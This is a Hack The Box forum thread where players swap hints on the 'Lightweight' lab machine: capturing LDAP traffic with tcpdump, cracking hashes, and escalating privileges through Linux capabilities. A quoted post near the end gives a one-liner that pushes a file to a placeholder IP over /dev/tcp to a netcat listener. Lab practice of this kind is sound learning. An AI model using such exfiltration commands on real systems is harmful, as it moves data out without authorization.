Lightweight

Can somebody help with the initial user? I am getting nothing interesting in the tc****p output. Stuck on it for 3 days. Please DM.
Thanks

Can someone PM me on what to do with the trigger and listen part? I am a bit stuck. I have found there is a certain page that takes longer to respond and I am connected with SSH, but not sure how to listen and how to listen.

Edit: Got user then root shell. PM for any hints (learned a lot from this one and it was good fun). Also thanks to others who helped me out.

Good luck and have fun

Hey guys, I found ld******2 hash password, but I am really stuck now…
Can you PM me for a hint?

Got user, and root shell!
An awesome machine to learn a lot about Linux capabilities and networking!
Also, if you google well enough there are some awesome tutorials about how to do priv esc with that.

Hi guys and girls!
This is my first try on an HTB box and I really can’t get very far. All I have is the SSH connection to my user account and a few dump files from Wireshark, where I cannot find any useful info yet… getting a little frustrated.

The hints with “capabilities” etc. didn’t help me much.
I would very much appreciate any help from you people. Please PM me, if you would like to help a noob out.

Thanks in advance 🙂

Anyone kind enough to PM me with hint on path to User? Hours of getting nowhere, except a priv esc to Root theory. Thanks in advance 🙂

I got some sdbm things, I don’t know how to use them, help!

Can anyone give me a hint towards the user? I already got some dump and some data, don’t know what to do with it. Thanks!

I found two binaries in the dir. And found there is something related to capability.
And followed that Medium article.
But still I am getting permission denied when reading files, even after applying the steps of that article properly.
Any help? Please DM
Thanks

Can anyone help me with the user stage? Send me a PM 🙂

Stuck at the root stage.
Found user.txt.
Found files in /home/ldapuser1 but don’t know how to leverage them to gain root.
Tried to search for certificates and keys to decrypt traffic in pcap but no luck.
Any help would be appreciated.

Anyone available to PM me on the first user?

I have a low-privilege shell (using my IP) and two LDAP hashes. Cracking it isn’t working. What am I missing? Can someone give a nudge?
EDIT: Got something from tcp****, but unable to modify l*** using this.

Ok, this was a strange box. I owned it in 2.5 hours but started to read hints in the forum too early! There is more than enough written in this thread. Do not read it if you want to have more fun. These tips will be enough:

User: Tcpdump Examples - 22 Tactical Commands | HackerTarget.com & remember that you can switch users & The LDAP Bind Operation – LDAP.com
Root: Inheritance

As usual, PM me if help needed 🙂

Just root’ed - really great box, learned a lot here!
PM me if you need any help.

Nice Box. Learned new stuff. Good stuff.

Currently I only got the nmap creds (lduser1 & lduser2, with both the {crypts}) + SSH into the box.

And I’m trying to find a way to get into the user without cracking the hashes (as I’ve seen people suggest), however I can’t seem to get any progress…

Anyone got advice on how to proceed? (Or what to listen on in the SSH shell?)

Man, I am just lost on this one. Can’t figure out what is needed to trigger the LDAP bind request I am trying to capture. If anyone can shoot me a PM on the initial user part, it would be much appreciated.

@bu77er0verfl0w said:

Got User, working on root. I’ve done the whole cap privesc on a different box, can’t remember which one atm. So I should pop this bad boy before I head to bed tonight. But before I finish and write my review, I want to share a quick tip for anyone doing this box who is having trouble transferring files:

cat FILE >& /dev/tcp/YOUR-IP/PORT

should do the trick, just don’t forget to set up a netcat listener on your Kali box that pipes out to a file.

Thanks for the tip! I went through the process of base64 encoding it, which was a pain.